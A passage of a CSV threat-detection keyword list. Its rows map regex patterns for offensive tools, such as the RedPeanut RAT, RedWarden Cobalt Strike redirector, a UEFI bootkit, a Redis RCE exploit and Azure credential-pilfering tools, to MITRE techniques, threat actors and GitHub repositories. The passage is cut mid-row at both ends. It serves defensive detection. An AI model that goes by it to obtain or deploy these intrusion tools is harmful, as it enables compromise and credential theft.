T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56550" "*redhuntlabs/BucketLoot*",".{0,1000}redhuntlabs\/BucketLoot.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","56551" "*RedHunt-OS*",".{0,1000}RedHunt\-OS.{0,1000}","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","N/A","10","1268","199","2025-01-22T10:50:09Z","2018-03-14T19:31:16Z","56552" "*Redirect LoadLibraryA to LdrLoadDll 
with spoofed ret addr !*",".{0,1000}Redirect\sLoadLibraryA\sto\sLdrLoadDll\swith\sspoofed\sret\saddr\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","56553" "*redirecttosmb.py *",".{0,1000}redirecttosmb\.py\s.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","56554" "*redis-rce*",".{0,1000}redis\-rce.{0,1000}","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","N/A","10","954","222","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z","56555" "*redlotus.efi*",".{0,1000}redlotus\.efi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","56556" "*RedPeanut Smb server started*",".{0,1000}RedPeanut\sSmb\sserver\sstarted.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56557" "*RedPeanut.Models*",".{0,1000}RedPeanut\.Models.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56558" "*redpeanut.pfx*",".{0,1000}redpeanut\.pfx.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56559" "*RedPeanut.Resources.*.txt",".{0,1000}RedPeanut\.Resources\..{0,1000}\.txt","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56560" "*RedPeanut.Utility*",".{0,1000}RedPeanut\.Utility.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56561" 
"*RedPeanutAgent.C2*",".{0,1000}RedPeanutAgent\.C2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56562" "*RedPeanutAgent.Core*",".{0,1000}RedPeanutAgent\.Core.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56563" "*RedPeanutAgent.cs*",".{0,1000}RedPeanutAgent\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56564" "*RedPeanutAgent.Evasion*",".{0,1000}RedPeanutAgent\.Evasion.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56565" "*RedPeanutAgent.Execution*",".{0,1000}RedPeanutAgent\.Execution.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - 
T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56566" "*RedPeanutAgent.Program*",".{0,1000}RedPeanutAgent\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56567" "*RedPeanutC2*",".{0,1000}RedPeanutC2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56568" "*RedPeanutCLI*",".{0,1000}RedPeanutCLI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56569" "*RedPeanutDBContext*",".{0,1000}RedPeanutDBContext.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56570" 
"*RedPeanutDBInitializer*",".{0,1000}RedPeanutDBInitializer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56571" "*RedPeanutHtaPowerShellScript*",".{0,1000}RedPeanutHtaPowerShellScript.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56572" "*RedPeanutHtaScript.hta*",".{0,1000}RedPeanutHtaScript\.hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56573" "*RedPeanutInstallUtil.cs*",".{0,1000}RedPeanutInstallUtil\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56574" "*RedPeanutManager.cs*",".{0,1000}RedPeanutManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - 
T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56575" "*RedPeanutMigrate.cs*",".{0,1000}RedPeanutMigrate\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56576" "*RedPeanutMSBuildScript.xml*",".{0,1000}RedPeanutMSBuildScript\.xml.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56577" "*RedPeanutPowershellScriptS*",".{0,1000}RedPeanutPowershellScriptS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56578" "*RedPeanutRP.cs*",".{0,1000}RedPeanutRP\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56579" "*RedPeanutShooter.*",".{0,1000}RedPeanutShooter\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56580" "*RedPeanutSpawn.cs*",".{0,1000}RedPeanutSpawn\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56581" "*RedPeanutSpawnTikiTorch.cs*",".{0,1000}RedPeanutSpawnTikiTorch\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56582" "*RedPeanutVBAMacro.vba*",".{0,1000}RedPeanutVBAMacro\.vba.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56583" 
"*RedSiege/CIMplant*",".{0,1000}RedSiege\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","56584" "*RedSiege/GraphStrike*",".{0,1000}RedSiege\/GraphStrike.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","56585" "*redskal/SharpAzbelt*",".{0,1000}redskal\/SharpAzbelt.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","1","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","56586" "*redsocks-fw.sh stop*",".{0,1000}redsocks\-fw\.sh\sstop.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","56587" "*Red-Team-Infrastructure-Wiki.*",".{0,1000}Red\-Team\-Infrastructure\-Wiki\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","56588" "*Red-Teaming-Toolkit*",".{0,1000}Red\-Teaming\-Toolkit.{0,1000}","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. 
If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","N/A","10","9454","2251","2025-04-14T02:23:20Z","2018-04-26T13:35:09Z","56589" "*RedTeamPentesting/kbtls*",".{0,1000}RedTeamPentesting\/kbtls.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","56590" "*RedTeamPentesting/pretender*",".{0,1000}RedTeamPentesting\/pretender.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","56591" "*RedTeamPentesting/resocks*",".{0,1000}RedTeamPentesting\/resocks.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","1","N/A","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","56592" "*RedWarden.py*",".{0,1000}RedWarden\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56593" "*RedWarden.test*",".{0,1000}RedWarden\.test.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56594" "*redwarden_access.log*",".{0,1000}redwarden_access\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","#logfile","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56595" "*redwarden_redirector.log*",".{0,1000}redwarden_redirector\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
